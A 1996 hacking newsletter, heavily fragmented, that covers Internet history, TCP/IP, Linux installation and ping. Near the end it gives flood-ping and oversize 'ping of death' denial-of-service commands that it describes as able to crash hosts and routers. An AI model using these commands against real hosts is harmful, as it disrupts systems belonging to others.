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acking for Dummies</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nts of Volume 2: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for Dummies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ux! </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360"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to TCP/I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ort Surf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et for Dummies -- skip this if you are a Unix wizard. But if you read on you’ll get some more kewl hacking instruc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ix Guides to (mostly) Harmless Hacking of Vol. 1 jumped immediately into how-to hacking tricks. But if you are like me, all those details of probing ports and playing with hypotheses and pinging down hosts gets a little dizzy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ow about catching our breath, standing back and reviewing what the heck it is that we are playing with? Once we get the basics under control, we then can move on to seriou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I have been wrestling with my conscience over whether to start giving you step-by-step instructions on how to gain root access to other peoples’ computers. The little angel on my right shoulder whispers, “Gaining root without permission on other people’s computers is not nice. So don’t tell people how to do it.” The little devil on my left shoulder says, “Carolyn, all these hackers think you don’t know nothin’! PROOVE to them you know how to crack!” The little angel says, “If anyone reading Guide to (mostly) Harmless Hacking tries out this trick, you might get in trouble with the law for conspiracy to damage other peoples’ computers.” The little devil says, “But, Carolyn, tell people how to crack into root and they will think you are KEW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ere’s the deal. In this and the next few issues of Guide to (mostly) Harmless Hacking I’ll tell you several ways to get logged on as the superuser in the root account of some Internet host computers. But the instructions will leave a thing or two to the imagin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theory is that if you are willing to wade through all this, you probably aren’t one of those cheap thrills hacker wannabes who would use this knowledge to do something destructive that would land you in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tip: If you wish to become a *serious* hacker, you’ll need Linux (a freeware variety of Unix) on your PC. One reason is that then you can crack into root legally all you want -- on your own computer. It sure beats struggling around on someone else’s computer only to discover that what you thought was root was a cleverly set trap and the sysadmin and FBI laugh at you all the way to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can be installed on a PC with as little as a 386 CPU, only 2 Mb RAM and as little as 20 MB of hard disk. You will need to reformat your hard disk. While some people have successfully installed Linux without trashing their DOS/Windows stuff, don’t count on getting away with it. Backup, backup, back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o to jail warning: Crack into root on someone else’s computer and the slammer becomes a definite possibility. Think about this: when you see a news story about some hacker getting busted, how often do you recognize the name? How often is the latest bust being done to someone famous, like Dark Tangent or se7en or Emmanuel Goldstein? How about, like, never! That’s because really good hackers figure out how to not do stupid stuff. They learn how to crack into computers for the intellectual challenge and to figure out how to make computers safe from intruders. They don’t bull their way into root and make a mess of things, which tends to inspire sysadmins to call the cop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iting notice: Is it too boring to just hack into your own Linux machine? Hang in there. Ira Winkler of the National Computer Security Association, Dean Garlick of the Space Dynamics Lab of Utah State University and I are working on setting up hack.net, a place where it will be legal to break into computers. Not only that, we’re looking for sponsors who will give cash awards and scholarships to those who show the greatest hacking skills. Now does that sound like more phun than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let’s jump into our hacking basics tutorial with a look at the wondrous anarchy that is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that these Guides to (mostly) Harmless Hacking focus on the Internet. That is because there are many legal ways to hack on the Internet. Also, there are over 10 million of these readily hackable computers on the Internet, and the number grows every da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et Bas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ne owns the Internet. No one runs it. It was never planned to be what it is today. It just happened, the mutant outgrowth of a 1969 US Defense Advanced Research Projects Agency experim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narchic system remains tied together because its users voluntarily obey some basic rules. These rules can be summed up in two words: Unix and TCP/IP (with a nod to UUCP). If you understand, truly understand Unix and TCP/IP (and UUCP), you will become a fish swimming in the sea of cyberspace, an Uberhacker among hacker wannabes, a master of the Internet univer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et technical, the Internet is a world-wide distributed computer/communications network held together by a common communications standard, Transmission Control Protocol/Internet Protocol (TCP/IP) and a bit of UUCP. These standards allow anyone to hook up a computer to the Internet, which then becomes another node in this network of the Internet. All that is needed is to get an Internet address assigned to the new computer, which is then known as an Internet "host," and tie into an Internet communications link. These links are now available in almost all parts of the worl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use an on-line service from your personal computer, you, too, can temporarily become part of the Internet. There are two main ways to hook up to an on-line servi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the cybercouch potato connection that every newbie uses. It requires either a point-to-point (PPP) or SLIPconnection, which allows you to run pretty pictures with your Web browser. If you got some sort of packaged software from your ISP, it automatically gives you this sort of connec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you can connect with a terminal emulator to an Internet host. This program may be something as simple as the Windows 3.1 “Terminal” program under the “Accessories” icon. Once you have dialed in and connected you are just another terminal on this host machine. It won’t give you pretty pictures. This connection will be similar to what you get on an old-fashioned BBS. But if you know how to use this kind of connection, it could even give you root access to that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how is the host computer you use attached to the Internet? It will be running some variety of the Unix operating system. Since Unix is so easy to adapt to almost any computer, this means that almost any computer may become an Internet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I sometimes enter the Internet through a host which is a Silicon Graphics Indigo computer at Utah State University. Its Internet address is fantasia.idec.sdl.usu.edu. This is a computer optimized for computer animation work, but it can also operate as an Internet host. On other occasions the entry point used may be pegasus.unm.edu, which is an IBM RS 6000 Model 370. This is a computer optimized for research at the University of New Mexic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y computer which can run the necessary software -- which is basically the Unix operating system -- has a modem, and is tied to an Internet communications link, may become an Internet node. Even a PC may become an Internet host by running one of the Linux flavors of Unix. After setting it up with Linux you can arrange with the ISP of your choice to link it permanently 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many ISPs use nothing more than networked PCs running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result, all the computing, data storage, and sending, receiving and forwarding of messages on the Internet is handled by the millions of computers of many types and owned by countless companies, educational institutions, governmental entities and even individual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of these computers has an individual address which enables it to be reached through the Internet if hooked up to a appropriate communications link. This address may be represented in two ways: as a name or a numb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unications links of the Internet are also owned and maintained in the same anarchic fashion as the hosts. Each owner of an Internet host is responsible for finding and paying for a communications link that will get that host tied in with at least one other host. Communications links may be as simple as a phone line, a wireless data link such as cellular digital packet data, or as complicated as a high speed fiber optic link. As long as the communications link can use TCP/IP or UUCP, it can fit in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 the net grows with no overall coordination. A new owner of an Internet host need only get permission to tie into one communications link to one other host. Alternatively, if the provider of the communications link decides this host is, for example, a haven for spammers, it can cut this “rogue site” off of the Internet. The rogue site then must snooker some other communications link into tying it into the Internet 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y most of these interconnected computers and communications links work is through the common language of the TCP/IP protocol. Basically, TCP/IP breaks any Internet communication into discrete "packets." Each packet includes information on how to rout it, error correction, and the addresses of the sender and recipient. The idea is that if a packet is lost, the sender will know it and resend the packet. Each packet is then launched into the Internet. This network may automatically choose a route from node to node for each packet using whatever is available at the time, and reassembles the packets into the complete message at the computer to which it was addres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packets may follow tortuous routes. For example, one packet may go from a node in Boston to Amsterdam and back to the US for final destination in Houston, while another packet from the same message might be routed through Tokyo and Athens, and so on. Usually, however, the communications links are not nearly so torturous. Communications links may include fiber optics, phone lines and satelli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rength of this packet-switched network is that most messages will automatically get through despite heavy message traffic congestion and many communications links being out of service. The disadvantage is that messages may simply disappear within the system. It also may be difficult to reach desired computers if too many communications links are unavailable at the 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all these wonderful features are also profoundly hackable. The Internet is robust enough to survive -- so its inventors claim -- even nuclear war. Yet it is also so weak that with only a little bit of instruction, it is possible to learn how to seriously spoof the system (forged email) or even temporarily put out of commission other people's Internet host computers (flood pinging, for examp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other hand, the headers on the packets that carry hacking commands will give away the account information from which a hacker is operating. For this reason it is hard to hide perfectly when on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this tension between this power and robustness and weakness and potential for confusion that makes the Internet a hacker playground. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360" w:right="360" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, HERE IS YOUR HACKER TIP YOU’VE BEEN WAITING FOR THIS ISSU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tp://ftp.secnet.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ftp site was posted on the BUGTRAQ list, which is dedicated to discussion of Unix security holes. Moderator is Aleph One, who is a genuine Uberhacker. If you want to subscribe to the BUGTRAQ, email LISTSERV@netspace.org with message “subscribe BUGTR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back to Internet bas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tory of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mentioned above, the Internet was born as a US Advanced Research Projects Agency (ARPA) effort in 1969. Its inventors called it ARPANET. But because of its value in scientific research, the US National Science Foundation (NSF) took it over in 1983. But over the years since then it gradually evolved away from any single source of control. In April 1995 NSF cut the last apron strings. Now the Internet is run by no one. It just happens and grows out of the efforts of those who play with it and struggle with the software and hardw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hing at all like this has ever happened before. We now have a computer system with a life of its own. We, as hackers, form a big part of the mutation engine that keeps the Internet evolving and growing stronger. We also form a big part of the immune system of this exotic creatu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riginal idea of ARPANET was to design a computer and communications network that would eventually become so redundant, so robust, and so able to operate without centralized control, that it could even survive nuclear war. What also happened was that ARPANET evolved into a being that has survived the end of government funding without even a blip in its growth. Thus its anarchic offspring, the Internet, has succeeded beyond the wildest dreams of its original architec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net has grown explosively, with no end in sight. At its inception as ARPANET it held only 4 hosts. A quarter of a century later, in 1984, it contained only 1000 hosts. But over the next 5 years this number grew tenfold to 10,000 (1989). Over the following 4 years it grew another tenfold to 1 million (1993). Two years later, at the end of 1995, the Internet was estimated to have at least 6 million host computers. There are probably over 10 million now. There appears to be no end in sight yet to the incredible growth of this mutant child of ARPA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one concern raised by the exponential growth in the Internet is that demand may eventually far outrace capacity. Because now no entity owns or controls the Internet, if the capacity of the communications links among nodes is too small, and it were to become seriously bogged down, it might be difficult to fix the proble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in 1988, Robert Morris, Jr. unleashed a "virus"-type program on the Internet commonly known as the “Morris Worm.” This virus would make copies of itself on whatever computer it was on and then send copies over communications links to other Internet hosts. (It used a bug in sendmail that allowed access to root, allowing the virus to act as the superus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ckly the exponential spread of this virus made the Internet collapse from the communications traffic and disk space it tied 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time the Internet was still under some semblance of control by the National Science Foundation and was connected to only a few thousand computers. The Net was shut down and all viruses purged from its host computers, and then the Net was put back into operation. Morris, meanwhile, was put in j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some concern that, despite improved security measures (for example, "firewalls"), someone may find a new way to launch a virus that could again shut down the Internet. Given the loss of centralized control, restarting it could be much more time-consuming if this were to happen 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reestablishing a centralized control today like what existed at the time of the “Morris Worm” is likely to be impossible. Even if it were possible, the original ARPANET architects were probably correct in their assessment that the Net would become more susceptible for massive failure rather than less if some centralized control were in pla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aps the single most significant feature of today's Internet is this lack of centralized control. No person or organization is now able to control the Internet. In fact, the difficulty of control became an issue as early as its first year of operation as ARPANET. In that year email was spontaneously invented by its users. To the surprise of ARPANET's managers, by the second year email accounted for the bulk of the communication over the syste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the Internet had grown to have a fully autonomous, decentralized life of its own, in April 1995, the NSF quit funding NSFNET, the fiber optics communications backbone which at one time had given NSF the technology to control the system. The proliferation of parallel communications links and hosts had by then completely bypassed any possibility of centralized contro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several major features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orld Wide Web -- a hypertext publishing network and now the fastest growing part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mail -- a way to send electronic mess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senet -- forums in which people can post and view public mess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elnet -- a way to login to remote Internet comp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ile transfer protocol -- a way to download files from remote Internet comp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nternet relay chat -- real-time text conversations -- used primarily by hackers and other Internet old-tim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opher -- a way of cataloging and searching for information. This is rapidly growing obsole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you port surfers know, there are dozens of other interesting but less well known services such as whois, finger, ping et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ld Wide Web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ld Wide Web is the newest major feature of the Internet, dating from the spring of 1992. It consists of "Web pages," which are like pages in a book, and links from specially marked words, phrases or symbols on each page to other Web pages. These pages and links together create what is known as "hypertext." This technique makes it possible to tie together many different documents which may be written by many people and stored on many different computers around the world into one hypertext docum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technique is based upon the Universal Resource Locator (URL) standard, which specifies how to hook up with the computer and access the files within it where the data of a Web page may be stor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RL is always of the form http://&lt;rest of address&gt;, where &lt;rest of address&gt; includes a domain name which must be registered with an organization called InterNIC in order to make sure that two different Web pages (or email addresses, or computer addresses) don't end up being identical. This registration is one of the few centralized control features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s how the hypertext of the World Wide Web works. The reader would come to a statement such as "our company offers LTL truck service to all major US cities." If this statement on the "Web page" is highlighted, that means that a click of the reader's computer mouse will take him or her to a new Web page with details. These may include complete schedules and a form to fill out to order a pickup and delive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Web pages even offer ways to make electronic payments, usually through credit card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 security of money transfers over the Internet is still a major issue. Yet despite concerns with verifiability of financial transactions, electronic commerce over the Web is growing fast. In its second full year of existence, 1994, only some $17.6 million in sales were conducted over the Web. But in 1995, sales reached $400 million. Today, in 1996, the Web is jammed with commercial sites begging for your credit card inform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 Web is being used as a tool in the distribution of a new form of currency, known as electronic cash. It is conceivable that, if the hurdle of verifiability may be overcome, that electronic cash (often called ecash) may play a major role in the world economy, simplifying international trade. It may also eventually make national currencies and even taxation as we know it obsole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amples of Web sites where one may obtain ecash include the Mark Twain Bank of St. Louis, MO (http://www.marktwain.com) and Digicash of Amsterdam, The Netherlands (http://www.digicash.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lmost out-of-control nature of the Internet manifests itself on the World Wide Web. The author of a Web page does not need to get permission or make any arrangement with the authors of other Web pages to which he or she wishes to establish links. Links may be established automatically simply by programming in the URLs of desired Web page lin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versely, the only way the author of a Web page can prevent other people from reading it or establishing hypertext links to it is to set up a password protection system (or by not having communications links to the rest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blem with the World Wide Web is how to find things on it. Just as anyone may hook a new computer up to the Internet, so also there is no central authority with control or even knowledge of what is published where on the World Wide Web. No one needs to ask permission of a central authority to put up a Web pa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a user knows the address (URL) of a Web page, or at least the URL of a Web page that links eventually to the desired page, then it is possible (so long as communications links are available) to almost instantly hook up with this pa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the value of knowing URLs, there now are many companies and academic institutions that offer searchable indexes (located on the Web) to the World Wide Web. Automated programs such as Web crawlers search the Web and catalog the URLs they encounter as they travel from hypertext link to hypertext link. But because the Web is constantly growing and changing, there is no way to create a comprehensive catalog of the entire Web.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is the second oldest use of the Internet, dating back to the ARPAnet of 1972. (The first use was to allow people to remotely log in to their choice of one of the four computers on which ARPAnet was launched in 197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two major uses of email: private communications, and broadcasted email. When broadcasted, email serves to make announcements (one-way broadcasting), and to carry on discussions among groups of people such as our Happy Hacker list. In the group discussion mode, every message sent by every member of the list is broadcasted to all other memb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wo most popular program types used to broadcast to email discussion groups are majordomo and listserv.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net was a natural outgrowth of the broadcasted email group discussion list. One problem with email lists is that there was no easy way for people new to these groups to join them. Another problem is that as the group grows, a member may be deluged with dozens or hundreds of email messages each da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79 these problems were addressed by the launch of Usenet. Usenet consists of news groups which carry on discussions in the form of "posts." Unlike an email discussion group, these posts are stored, typically for two weeks or so, awaiting potential readers. As new posts are submitted to a news group, they are broadcast to all Internet hosts that are subscribed to carry the news groups to which these posts belo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many Internet connection programs you can see the similarities between Usenet and email. Both have similar headers, which track their movement across the Net. Some programs such as Pine are sent up to send the same message simultaneously to both email addresses and newsgroups. All Usenet news readers allow you to email the authors of posts, and many also allow you to email these posts themselves to yourself or other peop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here is a quick overview of the Internet basics we plan to cover in the next several issues of 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ni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iscuss “shells” which allow one to write programs (“scripts”) that automate complicated series of Unix commands. The reader is introduced to the concept of scripts which perform hacking functions. We introduce Perl, which is a shell programming language used for the most elite of hacking scripts such as SAT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CP/IP and UUC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hapter covers the communications links that bind together the Internet from a hackers' perspective. Extra attention is given to UUCP since it is so hackab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nternet Addresses, Domain Names and Ro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ader learns how information is sent to the right places on the Internet, and how hackers can make it go to the wrong places! How to look up UUCP hosts (which are not under the domain name system) is includ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Fundamentals of Elite Hacking: Ports, Packets and File Permiss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ection lets the genie of serious hacking out of the bottle. It offers a series of exercises in which the reader can enjoy gaining access to almost any randomly chosen Internet host. In fact, by the end of the chapter the reader will have had the chance to practice several dozen techniques for gaining entry to other peoples' computers. Yet these hacks we teach are 100% lega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nt to subscribe to this list? Email hacker@techbroker.com with the message “subscribe happyhacker.” Want to share some kewl stuph with the Happy Hacker list? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com.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2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x has become the primo operating system of the Internet. In fact, Unix is the most widely used operating system in the world among computers with more power than P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e, Windows NT is coming up fast as a common Internet operating system, and is sooo wonderfully buggy that it looks like it could become the number one favorite to crack into. But today Unix in all its wonderful flavors still is the operating system to know in order to be a truly elite hack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far we have assumed that you have been hacking using a shell account that you get through your Internet Service Provider (ISP). A shell account allows you to give Unix commands on one of your ISP's computers. But you don't need to depend on your ISP for a machine that lets you play with Unix. You can run Unix on your own computer and with a SLIP or PPP connection be directly connected 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Serial Line Internet Protocol (SLIP) and Point-to-Point Protocol (PPP) connections give you a temporary Internet Protocol (IP) address that allows you to be hooked directly to the Internet. You have to use either SLIP or PPP connections to get to use a Web browser that gives you pictures instead on text only. So if you can see pictures on the Web, you already have one of these available to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dvantage of using one of these direct connections for your hacking activities is that you will not leave behind a shell log file for your ISP's sysadmin to pore over. Even if you are not breaking the law, a shell log file that shows you doing lots of hacker stuph can be enough for some sysadmins to summarily close your accou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the best kind of computer to run Unix on? Unless you are a wealthy hacker who thinks nothing of buying a Sun SPARC workstation, you'll probably do best with some sort of PC. There are almost countless variants of Unix that run on PCs, and a few for Macs. Most of them are free for download, or inexpensively available on CD-RO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hree most common variations of Unix that run on PCs are Sun's Solaris, FreeBSD and Linux. Solaris costs around $700. Enough said. FreeBSD is really, really good. But you con't find many manuals or newsgroups that cover FreeBS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however, has the advantage of being available in many variants (so you can have fun mixing and matching programs from different Linux offerings). Most importantly, Linux is supported by many manuals, news groups, mail lists and Web sites. If you have hacker friends in your area, most of them probably use Linux and can help you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torical note: Linux was created in 1991 by a group led by Linus Torvalds of the University of Helsinki. Linux is copyrighted under the GNU General Public License. Under this agreement, Linux may be redistributed to anyone along with the source code. Anyone can sell any variant of Linux and modify it and repackage it. But even if someone modifies the source code he or she may not claim copyright for anything created from Linux. Anyone who sells a modified version of Linux must provide source code to the buyers and allow them to reuse it in their commercial products without charging licensing fees. This arrangement is known as a "copylef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this arrangement the original creators of Linux receive no licensing or shareware fees. Linus Torvalds and the many others who have contributed to Linux have done so from the joy of programming and a sense of community with all of us who will hopefully use Linux in the spirit of good guy hacking. Viva Linux! Viva Torvald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 consists of the operating system itself (called the "kernel") plus a set of associated progra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ernel, like all types of Unix, is a multitasking, multi-user operating system. Although it uses a different file structure, and hence is not directly compatible with DOS and Windows, it is so flexible that many DOS and Windows programs can be run while in Linux. So a power user will probably want to boot up in Linux and then be able to run DOS and Windows programs from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ociated programs that come with most Linux distributions may includ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 shell program (Bourne Again Shell -- BASH -- is most comm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mpilers for programming languages such as Fortran-77 (my favorite!), C, C++, Pascal, LISP, Modula-2, Ada, Basic (the best language for a beginner), and Smalltal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 (sometimes called X-windows), a graphical user interfa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utility programs such as the email reader Pine (my favorite) and El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p ten reasons to install Linux on your P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When Linux is outlawed, only outlaws will own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installing Linux, it is so much fun to run fdisk without backing up fir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The flames you get from asking questions on Linux newsgroups are of a higher quality than the flames you get for posting to alt.sex.bestialit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No matter what flavor of Linux you install, you'll find out tomorrow there was a far more 3l1te ersion you should have gotten instea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eople who use Free BSD or Solaris will not make fun of you. They will offer their sympathy instea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At the next Def Con you'll be able to say stuph like "so then I su-ed to his account and grepped all his files for 'kissyface'." Oops, grepping other people's files is a no-no, forget I ever suggested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Port surf in privac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One word: exploi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Installing Linux on your office PC is like being a postal worker and bringing an Uzi to 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But - - if you install Linux on your office computer, you boss won't have a clue what that mea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types of Linux work best? It depends on what you really want. Redhat Linux is famed for being the easiest to install. The Walnut Creek Linux 3.0 CD-ROM set is also really easy to install -- for Linux, that is! My approach has been to get lots of Linux versions and mix and match the best from each distribu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ike the Walnut Creek version best because with my brand X hardware, its autodetection feature was a life-sa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ALLING LINUX is not for the faint of heart! Several tips for surviving installation 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though you in theory can run Linux on a 286 with 4 MB RAM and two floppy drives, it is *much* easier with a 486 or above with 8 MB RAM, a CD-ROM, and at least 200 MB free hard disk spa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now as much as possible about what type of mother board, modem, hard disk, CD-ROM, and video card you have. If you have any documentation for these, have them on hand to reference during install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t works better to use hardware that is name-brand and somewhat out-of-date on your computer. Because Linux is freeware, it doesn't offer device drivers for all the latest hardware. And if your hardware is like mine -- lots of Brand X and El Cheapo stuph, you can take a long time experimenting with what drivers will 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efore beginning installation, back up your hard disk(s)! In theory you can install Linux without harming your DOS/Windows files. But we are all human, especially if following the advice of point 7).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Get more than one Linux distribution. The first time I successfully installed Linux, I finally hit on something that worked by using the boot disk from one distribution with the CD-ROM for another. In any case, each Linux distribution had different utility programs, operating system emulators, compilers and more. Add them all to your system and you will be set up to become beyond eli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uy a book or two or three on Linux. I didn't like any of them! But they are better than nothing. Most books on Linux come with one or two CD-ROMs that can be used to install Linux. But I found that what was in the books did not exactly coincide with what was on the CD-RO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I recommend drinking while installing. It may not make debugging go any faster, but at least you won't care how hard it i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 can almost guarantee that even following all these 6 pieces of advice, you will still have problems installing Linux. Oh, do I have 7 advisories up there? Forget number 7. But be of good cheer. Since everyone else also suffers mightily when installing and using Linux, the Internet has an incredible wealth of resources for the Linux -challeng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are allergic to getting flamed, you can start out with Linux support Web si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est I have found is http://sunsite.unc.edu:/pub/Linux/. It includes the Linux Frequently Asked Questions list (FAQ), available fr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site.unc.edu:/pub/Linux/docs/F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directory /pub/Linux/docs on sunsite.unc.edu you'll find a number of other documents about Linux, including the Linux INFO-SHEET and META-F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nux HOWTO archive is on the sunsite.unc.edu Web site at: /pub/Linux/docs/HOWTO. The directory /pub/Linux/docs/LDP contains the current set of LDP manual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et ``Linux Installation and Getting Started'' from sunsite.unc.edu in /pub/Linux/docs/LDP/install-guide. The README file there describes how you can order a printed copy of the book of the same name (about 180 p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you don't mind getting flamed, you may want to post questions to the amazing number of Usenet news groups that cover Linux. These includ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advocacy Benefits of Linux compar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development.system Linux kernels, device dri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x Linux X Window System ser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development.apps Writing Linux applica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hardware Hardware compatibilit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setup Linux install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networking Networking and communica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answers FAQs, How-To's, READMEs, et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ux.redhat.mis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os.linux Use comp.os.linux.* instea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uu.comp.os.linux.questions Usenet University helps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announce Announcements important to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os.linux.misc Linux-specific top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nt your Linux free? Tobin Fricke has pointed out that "free copies of Linux CD-ROMs are available the Linux Support &amp; CD Givaway web site at http://emile.math.ucsb.edu:8000/giveaway.html. This is a project where people donate Linux CD's that they don't need any more. The project was seeded by Linux Systems Labs, who donated 800 Linux CDs initially! Please remember to donate your Linux CD's when you are done with them. If you live near a computer swap meet, Fry's, Microcenter, or other such place, look for Linux CD's there. They are usually under $20, which is an excellent investment. I personally like the Linux Developer's Resource by Infomagic, which is now up to a seven CD set, I believe, which includes all major Linux distributions (Slackware, Redhat, Debian, Linux for DEC Alpha to name a few)plus mirrors of tsx11.mit.edu and sunsite.unc.edu/pub/linux plus much more. You should also visit the WONDERFUL linux page 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sunsite.unc.edu/linux, which has tons of information, as well as th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linux.org/. You might also want to check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redhat.com/ and http://www.caldera.com/ for mo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on commercial versions of linux (which are still freely available under GN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about Linux security? Yes, Linux, like every operating system, is imperfect. Eminently hackable, if you really want to know. So if you want to find out how to secure your Linux system, or if you should come across one of the many ISPs that use Linux and want to go exploring (oops, forget I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ote that), here's where you can go for inf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tp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.att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tp://info.cert.org/pub/tech_tips/root_compromi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bach.cis.temple.edu/linux/linux-securit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geek-girl.com/bugtr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lso help for Linux users on Internet Relay Chat (IRC). Ben (cyberkid@usa.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sts a channel called #LinuxHelp on the Undernet IRC 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but not least, if you want to ask Linux questions on the Happy Hacker list, you're welcome. We may be the blind leading the blind, but wh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3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to TCP/IP. That means packets! Datagrams! Ping oversize packet denial of service exploit explained. But this hack is a lot less mostly harmless than most. Don't try this at ho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been on the Happy Hacker list for awhile, you've been getting some items forwarded from the Bugtraq list on a new ping packet explo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this has been sounding like gibberish to you, relax. It is really very simple. In fact, it is so simple that if you use Windows 95, by the time you finish this article you will know a simple, one-line command that you could use to crash many Internet hosts and rout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O TO JAIL WARNING: This time I'm not going to implore the wannabe evil genius types on this list to be virtuous and resist the temptation to misuse the information I'm about to give them. See if I care! If one of those guys gets caught crashing thousands of Internet hosts and routers, not only will they go to jail and get a big fine. We'll all think he or she is a dork. This exploit is a no-brainer, one-line command from Windows 95. Yeah, the operating system that is designed for clueless morons. So there is nothing elite about this hack. What is elite is being able to thwart this atta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If packets, datagrams, and TCP/IP aren't exactly your bosom buddies yet, believe me, you need to really get in bed with them in order to call yourself a hacker. So hang in here for some technical stuff. Wh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done, you'll have the satisfaction of knowing you could wreak havoc on the Internet, but are too elite to do s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cket is a way to send information electronically that keeps out errors. The idea is that no transmission technology is perfect. Have you ever played the game "telephone"? You get a dozen or so people in a circle and the first person whispers a message to the second. Something like "The bun is the lowest form of wheat." The second person whispers to the third, "A bum is the lowest form of cheating." The third whispers, "Rum is the lowest form o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inking." And so on. It's really fun to find out how far the message can mutate as it goes around the circ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when, for example, you get email, you would prefer that it isn't messed up. So the computer that sends the email breaks it up into little pieces called datagrams. Then it wraps things around each datagram that tell wh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uter it needs to go to, where it came from, and that check whether the datagram might have been garbled. These wrapped up datagram packages are called "packe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the computer sending email to you were to package a really long message into just one packet, chances are pretty high that it will get messed up while on its way to the other computer. Bit burps. So when the receiving computer checks the packet and finds that it got messed up,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throw it away and tell the other computer to send it again. It could take a long time until this giant packet gets through intac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f the message is broken into a lot of little pieces and wrapped up into bunches of packets, most of them will be good and the receiving computer will keep them. It will then tell the sending computer to retransmit just the packets that messed up. Then when all the pieces finally get there, the receiving computer puts them together in the right order and lo and behold, there is the complete, error-free em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IP stands for Transmission Control Protocol/Internet Protocol. It tells computers that are hooked up to the Internet how to package up messages into packets and how to read packets these packets from other computers. Ping uses TCP/IP to make its packe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g" is a command that sends a feeler out from your computer to another computer to see if it is turned on and hooked to the same network you are on. On the Internet there are some ten million computers that you can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g is a command you can give, for example, from the Unix, Windows 95 and Windows NT operating systems. It is part of the Internet Control Message Protocol (ICMP), which is used to troubleshoot TCP/IP networks. What it does is tell a remote computer to echo back a ping. So if you get your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you know that computer is alive. Furthermore, some forms of the ping command will also tell you how long it takes for a message to go out to that computer and come back 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how does your computer know that the ping it just sent out actually echoed back from the targeted computer? The datagram is the answer. The ping sent out a datagram. If the returning ping holds this same datagram, you know it was your ping that just echoed ba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asic format of this command is simpl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g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hostname" is the Internet address of the computer you want to check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give this command from Sun Release 4.1 Unix, I get the answer "hostname is ali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TIP: Because of the destructive powers of ping, many Internet Service Providers hide the ping program in their shell accounts where clueless newbies can't get their hands on it. If your shell account says "command not found" when you enter the ping command, t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r/etc/ping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is doesn't work, either try the command “whereis ping” or complain to your ISP's tech support. They may have ddiabled ping for ordinary users, but if you convince tech support you are a good Internet citizen they may let you use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You say you can't find a way to ping from your on-line service? That may be because you don't have a shell account. But there is one thing you really need in order to hack: A SHELL ACCOU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ason hackers make fun of people with America Online accounts is because that ISP doesn't give out shell accounts. This is because America Online wants you to be good boys and girls and not hac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hell account" is an Internet account in which your computer becomes a terminal of one of your ISP's host computers. Once you are in the "shell" you can give commands to the operating system (which is usually Unix) ju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ke you were sitting there at the console of one of your ISP's hos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ay already have a shell account but just not know how to log on to it. Call tech support with your ISP to find out whether you have one, and how to get on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ll sorts of fancy variations on the ping command. And, guess what, whenever there is a command you give over the Internet that has lots of variations, you can just about count on there being something hackable in there. Muhahah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lood ping is a simple example. If your operating system will let you get away with giving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ping -f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ends out a veritable flood of pings, as fast as your ISP's host machine can make them. This keeps the host you've targeted so busy echoing back your pings that it can do little else. It also puts a heavy load on the net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ckers with primitive skill levels will sometimes get together and use several of their computers at once to simultaneously ping some victim's Internet host computer. This will generally keep the victim's computer to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sy to do anything else. It may even crash. However, the down side (from the attackers' viewpoint) is that it keeps the attackers' computers tied up, to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TIQUETTE NOTE: Flood pinging a computer is extremely rude. Get caught doing this and you will be lucky if the worst that happens is your on-line service provider closes your account. Do this to a serious hacker and you may need an identity transpla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should start a flood ping kind of by accident, you can shut it off by holding down the control key and pressing "c" (control-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IL GENIUS TIP: Ping yourself! If you are using some sort of Unix, your operating system will let you use your computer to do just about anything to itself that it can do to other computers. The network address that takes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k to your own host computer is localhost (or 127.0.0.1). Here's an example of how I use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5] -&gt;telnet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7.0.0.1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OS UNIX (slu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I'm back to the login sequence for the computer named "slug" all o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 ping mysel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llama&gt; [68] -&gt;/usr/etc/ping local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lhost is ali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gives the same result as if I were to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llama&gt; [69] -&gt;/usr/etc/ping llam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lama.swcp.com is ali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HAHAHA TIP: Want to yank someone's chain? Tell him to ftp to 127.0.0.1 and log in using his or her own user name and password for kewl warez! My ex-husband Keith Henson did that to the Church of Scientology. The COGs ftp-ed to 127.0.0.1 and discovered all their copyrighted scriptures. The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umed this was on Keith's computer, not theirs. They were *so* sure he had their scriptures that they took him to court. The judge, when he realized they were simply looping back to their own computer, literally laughed them out of cour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 hilarious transcript or audio tape of this infamous court session, email hkhenson@cup.portal.com. That's Keith's email address. My hat is off to a superb hack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 oversize ping packet exploit you are about to learn will do even more damage to some hosts than a gang of flood ping conspirators. And it will do it without tying up the attackers' computer for any longer than the split second it takes to send out just one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asiest way to do this hack is to run Windows 95. Don't have it? You can generally find a El Cheapo store that will sell it to you for $9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do this, first set up your Windows 95 system so that you can make a PPP or SLIP connection with the Internet using the Dialup Networking program under the My Computer icon. You may need some help from your ISP tech support in setting this up. You must do it this way or this hack won't work. Your America Online dialer *definitely* will not work.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If your Internet connection allows you to run a Web browser that shows pictures, you can use that dialup number with your Windows 95 Dialup Networking program to get either a PPP or SLIP connec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get your connected to the Internet. But don't run a browser or anything. Instead, once your Dialup Networking program tell you that you have a connection, click on the "Start" button and go to the listing "MS-DOS." Open this DOS window. You'll get a promp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windows\&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let's first do this the good citizen way. At this prompt you can type in a plain ordinary "ping"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windows\ping hostna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hostname" is the address of some Internet computer. For example, you could ping thales.nmia.com, which is one of my favorite computers, named after an obscure Greek philosoph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you happened to know the address of one of Saddam Hussein's computers, however, you might want to give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windows\ping -l 65510 saddam_hussein's.computer.m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don't really do this to a real computer! Some, but not all, computers will crash and either remain hung or reboot when they get this ping. Others will continue working cheerily along, and then suddenly go under hours la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y? That extra added -l 65510 creates a giant datagram for the ping packet. Some computers, when asked to send back an identical datagram, get really messed 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ant all the gory details on this ping exploit, including how to protect your computers from it, check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sophist.demon.co.uk/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re are other ways to manufacture a giant ping datagram besides using Windows 95. For example, if you run certain FreeBSD or Linux versions of Unix on your PC, you can run this program, which was posted to the Bugtraq li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Bill Fenner &lt;fenner@freefall.freebsd.org&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ultiple recipients of list BUGTRAQ 